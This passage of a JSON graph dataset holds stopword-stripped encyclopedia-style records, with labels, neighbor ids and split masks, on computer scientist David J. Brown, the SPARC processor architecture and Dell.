    "text": "David_J._Brown:david j brown david j brown american computer scientist one small group helped develop system stanford later resulted sun microsystems later founder silicon graphics 1982 brown received primary secondary school education new york city studied university pennsylvania moore school electrical engineering received b.s.e 1979 m.s.e tutelage ruzena bajcsy 1980 1984 brown introduced david wheeler invited join university cambridge computer laboratory doctoral candidate october 1986 matriculated st john college university cambridge england pursue ph.d. dissertation introduced concept unified memory architecture idea subsequently widely applied — notably intel processors platform architecture late 1990s onward brown became member research staff computer science department stanford university 1981 helped develop research edition sun workstation andreas bechtolsheim prior establishment sun microsystems 1982 brown one group seven technical staff stanford along kurt akeley tom davis rocky rhodes mark hannah mark grossman charles herb kuta joined jim clark form silicon graphics brown stephen r. bourne formed workstation systems engineering group digital equipment corporation together built group responsible introduction decstation line computer systems 1992 brown joined sun microsystems helped establish process used company system software architecture went define application binary interface solaris sun principal system software product later brown worked solaris adoption open-source software practices technologies energy-efficient computing 1998 brown elected council association computing machinery later became founding editor acm queue magazine",
    "neighbors": [
      9665,
      6243,
      10051,
      5898,
      6858,
      7311,
      5873,
      5076,
      5141,
      3764,
      5272,
      221,
      7001,
      1149
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1399,
    "label": 3,
    "text": "SPARC:sparc sparc scalable processor architecture reduced instruction set computing risc instruction set architecture isa originally developed sun microsystems fujitsu design strongly influenced experimental berkeley risc system developed early 1980s first developed 1986 released 1987 sparc one successful early commercial risc systems success led introduction similar risc designs number vendors 1980s 90s first implementation original 32-bit architecture sparc v7 used sun sun-4 workstation server systems replacing earlier sun-3 systems based motorola 68000 series processors sparc v8 added number improvements part supersparc series processors released 1992 sparc v9 released 1993 introduced 64-bit architecture first released sun ultrasparc processors 1995 later sparc processors used symmetric multiprocessing smp non-uniform memory access cc-numa servers produced sun solbourne fujitsu among others design turned sparc international trade group 1989 since architecture developed members sparc international also responsible licensing promoting sparc architecture managing sparc trademarks including sparc owns providing conformance testing sparc international intended grow sparc architecture create larger ecosystem sparc licensed several manufacturers including atmel bipolar integrated technology cypress semiconductor fujitsu matsushita texas instruments due sparc international sparc fully open non-proprietary royalty-free september 2017 latest commercial high-end sparc processors fujitsu sparc64 xii introduced 2017 sparc m12 server sparc64 xifx introduced 2015 primehpc fx100 supercomputer oracle sparc m8 introduced september 2017 high-end servers friday september 1 2017 round layoffs started oracle labs november 2016 oracle terminated sparc design completion m8 much processor core development group austin texas dismissed teams santa clara california burlington massachusetts sparc development continues fujitsu returning role leading provider sparc servers new cpu due 2020 time frame sparc architecture heavily influenced earlier risc designs including risc ii university california berkeley ibm 801 original risc designs minimalist including features op-codes possible aiming execute instructions rate almost one instruction per clock cycle made similar mips architecture many ways including lack instructions multiply divide another feature sparc influenced early risc movement branch delay slot sparc processor usually contains many 160 general purpose registers according oracle sparc architecture 2015 specification implementation may contain 72 640 general-purpose 64-bit registers point 32 immediately visible software — 8 set global registers one g0 hard-wired zero seven usable registers 24 stack registers 24 registers form called register window function call/return window moved register stack window 8 local registers shares 8 registers adjacent windows shared registers used passing function parameters returning values local registers used retaining local values across function calls scalable sparc comes fact sparc specification allows implementations scale embedded processors large server processors sharing core non-privileged instruction set one architectural parameters scale number implemented register windows specification allows three 32 windows implemented implementation choose implement 32 provide maximum call stack efficiency implement three reduce cost complexity design implement number architectures include similar register file features include intel i960 ia-64 amd 29000 architecture gone several revisions gained hardware multiply divide functionality version 8 64-bit addressing data added version 9 sparc specification published 1994 sparc version 8 floating point register file 16 double-precision registers used two single-precision registers providing total 32 single precision registers odd-even number pair double precision registers used quad-precision register thus allowing 8 quad precision registers sparc version 9 added 16 double precision registers also accessed 8 quad precision registers additional registers accessed single precision registers sparc cpu implements quad-precision operations hardware 2004 tagged add subtract instructions perform adds subtracts values checking bottom two bits operands 0 reporting overflow useful implementation run time ml lisp similar languages might use tagged integer format endianness 32-bit sparc v8 architecture purely big-endian 64-bit sparc v9 architecture uses big-endian instructions access data either big-endian little-endian byte order chosen either application instruction load-store level memory page level via mmu setting latter often used accessing data inherently little-endian devices pci buses three major revisions architecture first published version 32-bit sparc version 7 v7 1986 sparc version 8 v8 enhanced sparc architecture definition released 1990 main differences v7 v8 addition integer multiply divide instructions upgrade 80-bit extended precision floating-point arithmetic 128-bit quad-precision arithmetic sparc v8 served basis ieee standard 1754-1994 ieee standard 32-bit microprocessor architecture sparc version 9 64-bit sparc architecture released sparc international 1993 developed sparc architecture committee consisting amdahl corporation fujitsu icl lsi logic matsushita philips ross technology sun microsystems texas instruments newer specifications always remain compliant full sparc v9 level 1 specification 2002 sparc joint programming specification 1 jps1 released fujitsu sun describing processor functions identically implemented cpus companies commonality first cpus conforming jps1 ultrasparc iii sun sparc64 v fujitsu functionalities covered jps1 documented processor implementation supplements end 2003 jps2 released support multicore cpus first cpus conforming jps2 ultrasparc iv sun sparc64 vi fujitsu early 2006 sun released extended architecture specification ultrasparc architecture 2005 includes non-privileged privileged portions sparc v9 also architectural extensions developed processor generations ultrasparc iii iv iv+ well cmt extensions starting ultrasparc t1 implementation 2007 sun released updated specification ultrasparc architecture 2007 ultrasparc t2 implementation complied august 2012 oracle corporation made available new specification oracle sparc architecture 2011 besides overall update reference adds vis 3 instruction set extensions hyperprivileged mode 2007 specification october 2015 oracle released sparc m7 first processor based new oracle sparc architecture 2015 specification.- revision includes vis 4 instruction set extensions hardware-assisted encryption silicon secured memory ssm sparc architecture provided continuous application binary compatibility first sparc v7 implementation 1987 sun ultrasparc architecture implementations among various implementations sparc sun supersparc ultrasparc-i popular used reference systems spec cpu95 cpu2000 benchmarks 296 mhz ultrasparc-ii reference system spec cpu2006 benchmark following organizations licensed sparc architecture notes sparc machines generally used sun sunos solaris opensolaris including derivatives illumos openindiana operating systems also used nextstep rtems freebsd openbsd netbsd linux 1993 intergraph announced port windows nt sparc architecture later cancelled october 2015 oracle announced linux sparc reference platform several fully open source implementations sparc architecture exist fully open source simulator sparc architecture also exists hpc loads fujitsu builds specialized sparc64 fx processors new instruction extensions set called hpc-ace high performance computing – arithmetic computational extensions fujitsu k computer ranked top500 june 2011 november 2011 lists combines 88,128 sparc64 viiifx cpus eight cores total 705,024 cores—almost twice many system top500 time k computer powerful next five systems list combined highest performance-to-power ratio supercomputer system also ranked green500 june 2011 list score 824.56 mflops/w november 2012 release top500 k computer ranked using far power top three ranked corresponding green500 release newer hpc processors ixfx xifx included recent primehpc fx10 fx100 supercomputers tianhe-2 top500 november 2014 number nodes galaxy ft-1500 opensparc-based processors developed china however processors contribute linpack score",
    "neighbors": [
      2066,
      26,
      36,
      6181,
      8231,
      2088,
      4144,
      10288,
      2105,
      6207,
      2113,
      4172,
      10327,
      10340,
      2149,
      6245,
      6268,
      4235,
      4237,
      142,
      4238,
      4241,
      4255,
      8352,
      8353,
      6311,
      4269,
      2224,
      2226,
      6322,
      4285,
      4286,
      6333,
      2241,
      6338,
      2243,
      10436,
      6341,
      2269,
      10463,
      242,
      8434,
      8435,
      10483,
      10485,
      249,
      8450,
      6415,
      2335,
      4386,
      2339,
      295,
      6445,
      309,
      8501,
      10553,
      8506,
      8508,
      6464,
      10561,
      8514,
      4423,
      6476,
      6483,
      344,
      2394,
      8539,
      8543,
      6502,
      8551,
      10601,
      10603,
      4465,
      10612,
      10620,
      4491,
      398,
      8594,
      407,
      409,
      10658,
      426,
      10669,
      2480,
      10675,
      4534,
      2490,
      453,
      4550,
      2503,
      6607,
      466,
      2514,
      2517,
      2523,
      4581,
      10732,
      10734,
      6639,
      499,
      4596,
      10746,
      4603,
      8700,
      508,
      10752,
      6659,
      8716,
      6675,
      10779,
      10781,
      10786,
      10789,
      10796,
      6705,
      4664,
      2617,
      2623,
      8771,
      2638,
      597,
      10837,
      8795,
      2655,
      2656,
      6754,
      10851,
      2666,
      8815,
      630,
      631,
      8822,
      639,
      8851,
      2710,
      8861,
      10910,
      8863,
      6815,
      6818,
      6821,
      8871,
      682,
      2731,
      10926,
      8890,
      6852,
      2762,
      10966,
      731,
      10974,
      10984,
      4841,
      10985,
      8944,
      757,
      2805,
      2811,
      2821,
      6924,
      6926,
      783,
      8976,
      2849,
      802,
      8994,
      6950,
      9003,
      6957,
      9010,
      9012,
      823,
      2871,
      4928,
      833,
      2895,
      9044,
      7022,
      11125,
      7033,
      11129,
      4989,
      9090,
      7072,
      9126,
      936,
      5040,
      9137,
      11184,
      2995,
      7104,
      9152,
      3014,
      5063,
      5065,
      977,
      11218,
      981,
      7134,
      5090,
      995,
      7148,
      7158,
      11255,
      7173,
      5137,
      1064,
      7218,
      1085,
      9280,
      7234,
      3142,
      9309,
      1122,
      11363,
      7270,
      3175,
      9320,
      5233,
      3188,
      9333,
      3191,
      3197,
      9343,
      7307,
      7313,
      5267,
      9363,
      9369,
      1178,
      9371,
      7326,
      11424,
      1185,
      11426,
      3247,
      9391,
      11447,
      5326,
      9422,
      5329,
      9428,
      3285,
      5335,
      7386,
      11487,
      1250,
      5356,
      9452,
      5358,
      5375,
      3328,
      5378,
      7432,
      1298,
      11539,
      7450,
      9500,
      1316,
      11580,
      9540,
      9541,
      9547,
      7505,
      11604,
      3413,
      5471,
      1376,
      3431,
      11626,
      9582,
      11636,
      1402,
      3451,
      5498,
      5501,
      3457,
      5506,
      1422,
      3470,
      5518,
      1425,
      5523,
      3493,
      1461,
      1462,
      1463,
      7607,
      5569,
      9665,
      1480,
      1499,
      3547,
      1502,
      1503,
      7653,
      1515,
      9707,
      1539,
      9731,
      7687,
      9739,
      3603,
      7699,
      5655,
      5663,
      5677,
      3630,
      1594,
      1606,
      3654,
      1611,
      7770,
      1632,
      7783,
      5742,
      3702,
      7806,
      1675,
      1694,
      5793,
      1707,
      7852,
      3762,
      7858,
      9911,
      9920,
      9932,
      5840,
      7889,
      5844,
      1755,
      9955,
      7911,
      9964,
      7919,
      1776,
      5872,
      9976,
      1786,
      1788,
      7941,
      1798,
      1801,
      9996,
      1809,
      1818,
      1820,
      5922,
      3886,
      7983,
      5948,
      3911,
      8007,
      3919,
      10089,
      1903,
      8048,
      6006,
      3966,
      10111,
      6038,
      6049,
      1967,
      8120,
      8125,
      4030,
      8126,
      6084,
      8136,
      10200,
      6107,
      4071,
      8179,
      2039,
      8186
    ],
    "mask": "Test"
  },
  {
    "node_id": 1400,
    "label": 7,
    "text": "Dell:dell dell us multinational computer technology company develops sells repairs supports computers related products services named founder michael dell company one largest technological corporations world employing 145,000 people u.s. around world annual report 2018 dell sells personal computers pcs servers data storage devices network switches software computer peripherals hdtvs cameras printers mp3 players electronics built manufacturers company well known innovations supply chain management electronic commerce particularly direct-sales model build-to-order configure order approach manufacturing—delivering individual pcs configured customer specifications dell pure hardware vendor much existence acquisition 2009 perot systems dell entered market services company since made additional acquisitions storage networking systems aim expanding portfolio offering computers delivering complete solutions enterprise customers dell listed number 51 fortune 500 list 2014 going private 2013 newly confidential nature financial information prevents company ranked fortune 2015 third largest pc vendor world lenovo hp dell largest shipper pc monitors worldwide dell sixth largest company texas total revenue according fortune magazine second largest non-oil company texas – behind – largest company greater austin area publicly traded company well component nasdaq-100 p 500 taken private leveraged buyout closed october 30 2013 2015 dell acquired enterprise technology firm emc corporation following completion purchase dell emc became divisions dell technologies dell traces origins 1984 michael dell created dell computer corporation time business pc limited student university texas austin dorm-room headquartered company sold ibm pc-compatible computers built stock components dell dropped school focus full-time fledgling business getting 1,000 expansion-capital family 1985 company produced first computer design turbo pc sold 795 pc limited advertised systems national computer magazines sale directly consumers custom assembled ordered unit according selection options company grossed 73 million first year operation 1986 michael dell brought lee walker 51-year-old venture capitalist president chief operating officer serve dell mentor implement dell ideas growing company walker also instrumental recruiting members board directors company went public 1988 walker retired 1990 due health michael dell hired morton meyerson former ceo president electronic data systems transform company fast-growing medium-sized firm billion-dollar enterprise company dropped pc limited name 1987 become dell computer corporation began expanding globally june 1988 dell market capitalization grew 30 million 80 million june 22 initial public offering 3.5 million shares 8.50 share 1992 fortune magazine included dell computer corporation list world 500 largest companies making michael dell youngest ceo fortune 500 company ever 1993 complement direct sales channel dell planned sell pcs big-box retail outlets wal-mart would brought additional 125 million annual revenue bain consultant kevin rollins persuaded michael dell pull deals believing would money losers long run margins retail thin best dell left reseller channel 1994 rollins would soon join dell full-time eventually become company president ceo originally dell emphasize consumer market due higher costs unacceptably-low profit margins selling individuals households changed company internet site took 1996 1997 industry average selling price individuals going dell going second- third-time computer buyers wanted powerful computers multiple features need much technical support choosing dell dell found opportunity among pc-savvy individuals liked convenience buying direct customizing pc means delivered days early 1997 dell created internal sales marketing group dedicated serving home market introduced product line designed especially individual users 1997 2004 dell enjoyed steady growth gained market share competitors even industry slumps period rival pc vendors compaq gateway ibm packard bell ast research struggled eventually left market bought dell surpassed compaq become largest pc manufacturer 1999 operating costs made 10 percent dell 35 billion revenue 2002 compared 21 percent revenue hewlett-packard 25 percent gateway 46 percent cisco 2002 compaq merged hewlett packard fourth-place pc maker newly combined hewlett packard took top spot struggled dell soon regained lead dell grew fastest early 2000s dell attained maintained top rating pc reliability customer service/technical support according consumer reports year year mid-to-late 90 2001 right windows xp released 1996 dell began selling computers website mid-1990s dell expanded beyond desktop computers laptops selling servers starting low-end servers major three providers servers time ibm hewlett packard compaq many based proprietary technology ibm power4 microprocessors various proprietary versions unix operating system dell new poweredge servers require major investment proprietary technologies ran microsoft windows nt intel chips could built cheaper competitors consequently dell enterprise revenues almost nonexistent 1994 accounted 13 percent company total intake 1998 three years later dell passed compaq top provider intel-based servers 31 percent market dell first acquisition occurred 1999 purchase convergenet technologies 332 million dell failed develop enterprise storage system in-house convergenet elegant complex technology fit dell commodity-producer business model forcing dell write entire value acquisition 2002 dell expanded product line include televisions handhelds digital audio players printers chairman ceo michael dell repeatedly blocked president coo kevin rollins attempt lessen company heavy dependency pcs rollins wanted fix acquiring emc corporation 2003 company rebranded simply dell inc. recognize company expansion beyond computers 2004 michael dell resigned ceo retaining position chairman handing ceo title kevin rollins president coo since 2001 despite longer holding ceo title dell essentially acted de facto co-ceo rollins rollins dell acquired alienware manufacturer high-end pcs targeted mainly towards gaming market 2005 earnings sales continued rise sales growth slowed considerably company stock lost 25 value year june 2006 stock traded around us 25 40 july 2005—the high-water mark company post-dotcom era slowing sales growth attributed maturing pc market constituted 66 dell sales analysts suggested dell needed make inroads non-pc businesses segments storage services servers dell price advantage tied ultra-lean manufacturing desktop pcs became less important savings became harder find inside company supply chain competitors hewlett-packard acer made pc manufacturing operations efficient match dell weakening dell traditional price differentiation throughout entire pc industry declines prices along commensurate increases performance meant dell fewer opportunities upsell customers lucrative strategy encouraging buyers upgrade processor memory result company selling greater proportion inexpensive pcs eroded profit margins laptop segment become fastest-growing pc market dell produced low-cost notebooks china like pc manufacturers eliminated dell manufacturing cost advantages plus dell reliance internet sales meant missed growing notebook sales big box stores cnet suggested dell getting trapped increasing commoditization high volume low margin computers prevented offering exciting devices consumers demanded despite plans expanding global regions product segments dell heavily dependent u.s. corporate pc market desktop pcs sold commercial corporate customers accounted 32 percent revenue 85 percent revenue comes businesses sixty-four percent revenue comes north south america according 2006 third-quarter results u.s. shipments desktop pcs shrinking corporate pc market purchases pcs upgrade cycles largely decided take break buying new systems last cycle started around 2002 three years companies started buying pcs ahead perceived y2k problems corporate clients expected upgrade extensive testing microsoft windows vista expected early 2007 putting next upgrade cycle around 2008 heavily depending pcs dell slash prices boost sales volumes demanding deep cuts suppliers dell long stuck direct sales model consumers become main drivers pc sales recent years yet decline consumers purchasing pcs web phone increasing numbers visiting consumer electronics retail stores try devices first dell rivals pc industry hp gateway acer long retail presence well poised take advantage consumer shift lack retail presence stymied dell attempts offer consumer electronics flat-panel tvs mp3 players dell responded experimenting mall kiosks plus quasi-retail stores texas new york dell reputation company relied upon supply chain efficiencies sell established technologies low prices instead innovator mid-2000s many analysts looking innovating companies next source growth technology sector dell low spending r relative revenue compared ibm hewlett packard apple inc. —which worked well commoditized pc market—prevented making inroads lucrative segments mp3 players later mobile devices increasing spending r would cut operating margins company emphasized dell done well horizontal organization focused pcs computing industry moved horizontal mix-and-match layers 1980s mid-2000 industry shifted vertically integrated stacks deliver complete solutions dell lagged far behind competitors like hewlett packard oracle dell reputation poor customer service since 2002 exacerbated moved call centers offshore growth outstripped technical support infrastructure came increasing scrutiny web original dell model known high customer satisfaction pcs sold thousands 2000s company could justify level service computers lineup sold hundreds rollins responded shifting dick hunter head manufacturing head customer service hunter noted dell dna cost-cutting got way aimed reduce call transfer times call center representatives resolve inquiries one call 2006 dell spent 100 million months improve rolled dellconnect answer customer inquiries quickly july 2006 company started direct2dell blog february 2007 michael dell launched ideastorm.com asking customers advice including selling linux computers reducing promotional bloatware pcs initiatives manage cut negative blog posts 49 22 well reduce dell hell prominent internet search engines also criticism dell used faulty components pcs particularly 11.8 million optiplex desktop computers sold businesses governments may 2003 july 2005 suffered faulty capacitors battery recall august 2006 result dell laptop catching fire caused much negative attention company though later sony found responsible faulty batteries 2006 marked first year dell growth slower pc industry whole fourth quarter 2006 dell lost title largest pc manufacturer rival hewlett packard whose personal systems group invigorated thanks restructuring initiated ceo mark hurd four five quarterly earnings reports expectations rollins resigned president ceo january 31 2007 founder michael dell assumed role ceo dell announced change campaign called dell 2.0 reducing number employees diversifying company products chairman board relinquishing ceo position michael dell still significant input company rollins years ceo return michael dell ceo company saw immediate changes operations exodus many senior vice-presidents new personnel brought outside company michael dell announced number initiatives plans part dell 2.0 initiative improve company financial performance include elimination 2006 bonuses employees discretionary awards reduction number managers reporting directly michael dell 20 12 reduction bureaucracy jim schneider retired cfo replaced donald carty company came sec probe accounting practices april 23 2008 dell announced closure one biggest canadian call-centers kanata ontario terminating approximately 1100 employees 500 redundancies effective spot official closure center scheduled summer call-center opened 2006 city ottawa bid host less year later dell planned double workforce nearly 3,000 workers add new building plans reversed due high canadian dollar made ottawa staff relatively expensive also part dell turnaround involved moving call-center jobs offshore cut costs company also announced shutdown edmonton alberta office losing 900 jobs total dell announced ending 8,800 jobs 2007–2008 — 10 workforce late 2000s dell configure order approach manufacturing—delivering individual pcs configured customer specifications us facilities longer efficient competitive high-volume asian contract manufacturers pcs became powerful low-cost commodities dell closed plants produced desktop computers north american market including mort topfer manufacturing center austin texas original location lebanon tennessee opened 1999 2008 early 2009 respectively desktop production plant winston-salem north carolina received us 280 million incentives state opened 2005 ceased operations november 2010 dell contract state required repay incentives failing meet conditions sold north carolina plant herbalife work used take place dell u.s. plants transferred contract manufacturers asia mexico dell factories overseas miami florida facility alienware subsidiary remains operation dell continues produce servers profitable products austin texas january 8 2009 dell announced closure manufacturing plant limerick ireland loss 1,900 jobs transfer production plant łodź poland release apple ipad tablet computer negative impact dell major pc vendors consumers switched away desktop laptop pcs dell mobility division managed success developing smartphones tablets whether running windows google android dell streak failure commercially critically due outdated os numerous bugs low resolution screen infoworld suggested dell oems saw tablets short-term low-investment opportunity running google android approach neglected user interface failed gain long term market traction consumers dell responded pushing higher-end pcs xps line notebooks compete apple ipad kindle fire tablets growing popularity smartphones tablet computers instead pcs drove dell consumer segment operating loss q3 2012 december 2012 dell suffered first decline holiday sales five years despite introduction windows 8 shrinking pc industry dell continued lose market share dropped lenovo 2011 fall number three world dell fellow american contemporary hewlett packard came pressure asian pc manufacturers lenovo asus acer lower production costs willing accept lower profit margins addition asian pc vendors improving quality design instance lenovo thinkpad series winning corporate customers away dell laptops dell customer service reputation slipping dell remained second-most profitable pc vendor took 13 percent operating profits pc industry q4 2012 behind apple inc. macintosh took 45 percent seven percent hewlett packard six percent lenovo asus one percent acer dell attempting offset declining pc business still accounted half revenue generates steady cash flow expanding enterprise market servers networking software services avoided many acquisition writedowns management turnover plagued chief rival hewlett packard dell also managed success taking advantage high-touch direct sales heritage establish close relationships design solutions clients despite spending 13 billion acquisitions diversify portfolio beyond hardware company unable convince market could thrive made transformation post-pc world suffered continued declines revenue share price dell market share corporate segment previously moat rivals longer case sales profits fallen precipitously several weeks rumors started around january 11 2013 dell announced february 5 2013 struck 24.4 billion leveraged buyout deal would delisted shares nasdaq hong kong stock exchange taken private reuters reported michael dell silver lake partners aided 2 billion loan microsoft would acquire public shares 13.65 apiece 24.4 billion buyout projected largest leveraged buyout backed private equity since 2007 financial crisis also largest technology buyout ever surpassing 2006 buyout freescale semiconductor 17.5 billion founder dell michael dell said february offer believe transaction open exciting new chapter dell customers team members dell rival lenovo reacted buyout saying financial actions traditional competitors substantially change outlook march 2013 blackstone group carl icahn expressed interest purchasing dell april 2013 blackstone withdrew offer citing deteriorating business private equity firms kkr co. tpg capital declined submit alternative bids dell citing uncertain market personal computers competitive pressures wide-open bidding war never materialized analysts said biggest challenge facing silver lake would find “ exit strategy ” profit investment would company would hold ipo go public one warned “ even get 25bn enterprise value dell take years get out. ” may 2013 dell joined board voting offer following august reached deal special committee board 13.88 raised price 13.75 plus special dividend 13 cents per share well change voting rules 13.88 cash offer plus .08 per share dividend third fiscal quarter accepted september 12 closed october 30 2013 ending dell 25-year run publicly traded company buyout newly private dell offered voluntary separation programme expected reduce workforce seven percent reception program exceeded expectations dell may forced hire new staff make losses november 19 2015 dell alongside arm holdings cisco systems intel microsoft princeton university founded openfog consortium promote interests development fog computing july 2018 dell announced intentions become publicly traded company paying 21.7 billion cash stock buy back shares stake vmware november 2018 carl icahn 9.3 owner dell sued company plans go public october 12 2015 dell announced intent acquire enterprise software storage company emc corporation 67 billion labeled highest-valued tech acquisition history announcement came two years dell inc. returned private ownership claiming faced bleak prospects would need several years public eye rebuild business thought company value roughly doubled since emc pressured elliott management hedge fund holding 2.2 emc stock reorganize unusual federation structure emc divisions effectively run independent companies elliott argued structure deeply undervalued emc core emc ii data storage business increasing competition emc ii vmware products confusing market hindering companies wall street journal estimated 2014 dell revenue 27.3billion personal computers 8.9bn servers emc 16.5bn emc ii 1bn rsa security 6bn vmware 230million pivotal software emc owns around 80 percent stock vmware proposed acquisition maintain vmware separate company held via new tracking stock parts emc rolled dell acquisition closes dell publish quarterly financial results ceased going private 2013 combined business expected address markets scale-out architecture converged infrastructure private cloud computing playing strengths emc dell commentators questioned deal fbr capital markets saying though makes ton sense dell nightmare scenario would lack strategic synergies emc fortune said lot dell like emc portfolio add enough justify tens billions dollars entire package probably register reported view william blair company merger would blow current chess board forcing infrastructure vendors restructure achieve scale vertical integration value vmware stock fell 10 announcement valuing deal around 63–64bn rather 67bn originally reported key investors backing deal besides dell singapore temasek holdings silver lake partners september 7 2016 dell completed acquisition emc post-acquisition dell re-organized new parent company dell technologies dell consumer workstation businesses internally referred dell client solutions group one company three main business divisions alongside dell emc vmware dell headquarters located round rock texas company employed 14,000 people central texas region largest private employer space 1999 almost half general fund city round rock originated sales taxes generated dell headquarters dell previously headquarters arboretum complex northern austin texas 1989 dell occupied arboretum complex 1990 dell 1,200 employees headquarters 1993 dell submitted document round rock officials titled dell computer corporate headquarters round rock texas may 1993 schematic design despite filing year company said going move headquarters 1994 dell announced moving employees arboretum going continue occupy top floor arboretum company official headquarters address would continue arboretum top floor continued hold dell board room demonstration center visitor meeting room less one month prior august 29 1994 dell moved 1,100 customer support telephone sales employees round rock dell lease arboretum scheduled expire 1994 1996 dell moving headquarters round rock january 1996 3,500 people still worked current dell headquarters one building round rock headquarters round rock 3 space 6,400 employees scheduled completed november 1996 1998 dell announced going add two buildings round rock complex adding office space complex 2000 dell announced would lease space las cimas office complex unincorporated travis county texas austin west lake hills house company executive offices corporate headquarters 100 senior executives scheduled work building end 2000 january 2001 company leased space las cimas 2 located along loop 360 las cimas 2 housed dell executives investment operations corporate functions dell also option space las cimas 3 slowdown business required reducing employees production capacity dell decided sublease offices two buildings las cimas office complex 2002 dell announced planned sublease space another tenant company planned move headquarters back round rock tenant secured 2003 dell moved headquarters back round rock leased las cimas ii total seven-year period 2003 year roughly space absorbed new subtenants 2008 dell switched power sources round rock headquarters environmentally friendly ones 60 total power coming txu energy wind farms 40 coming austin community landfill gas-to-energy plant operated waste management inc. dell facilities united states located austin texas nashua new hampshire nashville tennessee oklahoma city oklahoma peoria illinois hillsboro oregon portland area winston-salem north carolina eden prairie minnesota dell compellent bowling green kentucky lincoln nebraska miami florida facilities located abroad include penang malaysia xiamen china bracknell uk manila philippines chennai india hyderabad india noida india hortolandia porto alegre brazil bratislava slovakia łódź poland panama city panama dublin limerick ireland casablanca morocco montpellier france us india countries dell business functions provide support globally research development manufacturing finance analysis customer care early beginnings dell operated pioneer configure order approach manufacturing—delivering individual pcs configured customer specifications contrast pc manufacturers times delivered large orders intermediaries quarterly basis minimize delay purchase delivery dell general policy manufacturing products close customers also allows implementing just-in-time jit manufacturing approach minimizes inventory costs low inventory another signature dell business model—a critical consideration industry components depreciate rapidly dell manufacturing process covers assembly software installation functional testing including burn-in quality control throughout company history dell manufactured desktop machines in-house contracted manufacturing base notebooks configuration in-house company approach changed cited 2006 annual report states continuing expand use original design manufacturing partnerships manufacturing outsourcing relationships wall street journal reported september 2008 dell approached contract computer manufacturers offers sell plants late 2000s dell configure order approach manufacturing—delivering individual pcs configured customer specifications us facilities longer efficient competitive high-volume asian contract manufacturers pcs became powerful low-cost commodities assembly desktop computers north american market formerly took place dell plants austin texas original location lebanon tennessee opened 1999 closed 2008 early 2009 respectively plant winston-salem north carolina received us 280 million incentives state opened 2005 ceased operations november 2010 dell contract state requires repay incentives failing meet conditions work used take place dell u.s. plants transferred contract manufacturers asia mexico dell factories overseas miami florida facility alienware subsidiary remains operation dell continues produce servers profitable products austin texas dell assembled computers emea market limerick facility republic ireland employed 4,500 people country dell began manufacturing limerick 1991 went become ireland largest exporter goods second-largest company foreign investor january 8 2009 dell announced would move dell manufacturing limerick dell new plant polish city łódź january 2010 european union officials said would investigate €52.7million aid package polish government used attract dell away ireland european manufacturing facility 1 emf1 opened 1990 emf3 form part raheen industrial estate near limerick emf2 previously wang facility later occupied flextronics situated castletroy closed 2002 dell inc. consolidated production emf3 emf1 contains offices subsidies polish government keep dell long time ending assembly limerick plant cherrywood technology campus dublin largest dell office republic 1200 people sales mainly uk ireland support enterprise support emea research development cloud computing manufacturing except dell alienware subsidiary manufactures pcs athlone ireland plant whether facility remain ireland certain construction emf4 łódź poland dell started production autumn 2007 dell opened plants penang malaysia 1995 xiamen china 1999 facilities serve asian market assemble 95 dell notebooks dell inc. invested estimated 60 million new manufacturing unit chennai india support sales products indian subcontinent indian-made products bear made india mark 2007 chennai facility target producing 400,000 desktop pcs plans envisaged starting produce notebook pcs products second half 2007 dell moved desktop notebook poweredge server manufacturing south american market eldorado sul plant opened 1999 new plant hortolandia brazil 2007 corporation markets specific brand names different market segments business/corporate class represent brands company advertising emphasizes long life-cycles reliability serviceability brands include dell home office/consumer class emphasizes value performance expandability brands include dell peripherals class includes usb keydrives lcd televisions printers dell monitors includes lcd tvs plasma tvs projectors hdtv monitors dell ultrasharp high-end brand monitors dell service support brands include dell solution station extended domestic support services previously dell call dell support center extended support services abroad dell business support commercial service-contract provides industry-certified technician lower call-volume normal queues dell everdream desktop management software service remote-desktop management originally saas company founded elon musk cousin lyndon rive dell bought 2007 tech team support-queue available home users purchased systems either dell website dell phone-centers discontinued products brands include axim pda discontinued april 9 2007 dimension home small office desktop computers discontinued july 2007 dell digital jukebox mp3 player discontinued august 2006 dell powerapp application-based servers dell optiplex desktop tower computers previously supported run server desktop operating systems november 2015 emerged several dell computers shipped identical pre-installed root certificate known edellroot raised security risks attackers impersonating https-protected websites google bank america malware signed certificate bypass microsoft software filtering dell apologised offered removal tool also november 2015 researcher discovered customers diagnostic program dell foundation services could digitally tracked using unique service tag number assigned program possible even customer enabled private browsing deleted browser cookies ars technica recommended dell customers uninstall program issue addressed board consists nine directors michael dell founder company serves chairman board chief executive officer board members include carty judy lewent klaus luft alex mandl sam nunn shareholders elect nine board members meetings board members get majority votes must submit resignation board subsequently choose whether accept resignation board directors usually sets five committees oversight specific matters committees include audit committee handles accounting issues including auditing reporting compensation committee approves compensation ceo employees company finance committee handles financial matters proposed mergers acquisitions governance nominating committee handles various corporate matters including nomination board antitrust compliance committee attempts prevent company practices violating antitrust laws day-to-day operations company run global executive management committee sets strategic direction dell regional senior vice-presidents countries united states including david marmonti emea stephen j. felice asia/japan officers included martin garvin senior vice president worldwide procurement susan sheskey vice president chief information officer dell advertisements appeared several types media including television internet magazines catalogs newspapers dell inc marketing strategies include lowering prices times year free bonus products dell printers free shipping encourage sales stave competitors 2006 dell cut prices effort maintain 19.2 market share also cut profit margins half 8.7 4.3 percent maintain low prices dell continues accept purchases products via internet telephone network move customer-care division india el salvador popular united states television print ad campaign early 2000s featured actor ben curtis playing part steven lightly mischievous blond-haired youth came assistance bereft computer purchasers television advertisement usually ended steven catch-phrase dude 're gettin dell subsequent advertising campaign featured interns dell headquarters curtis character appearing small cameo end one first commercials particular campaign 2007 dell switched advertising agencies us bbdo working mother media july 2007 dell released new advertising created working mother support inspiron xps lines ads featured music flaming lips devo re-formed especially record song ad work also 2007 dell began using slogan say customizes computers fit customers requirements beginning 2011 dell began hosting conference austin texas austin convention center titled dell world event featured new technology services provided dell dell partners 2011 event held october 12–14 2012 event held december 11–13 2013 event held december 11–13 2014 event held november 4–6 2015 event held october 20–23 late 2007 dell inc. announced planned expand program value-added resellers vars giving official name dell partner direct new website dell india started online ecommerce website dell partner www.compuindia.com gng electronics pvt ltd termed dell express ship affiliate desa main objective reduce delivery time customers visit dell india official site given option buy online redirected dell affiliate website compuindia.com dell also operates captive analytics division supports pricing web analytics supply chain operations dga operates single centralized entity global view dell business activities firm supports 500 internal customers worldwide created quantified impact 500 million 2008 dell received press coverage claim world secure laptops specifically latitude d630 latitude d830 lenovo request u.s. national advertising division nad evaluated claim reported dell enough evidence support dell first opened retail stores india early 1990s dell sold products best buy costco sam club stores united states dell stopped practice 1994 citing low profit margins business exclusively distributing direct-sales model next decade 2003 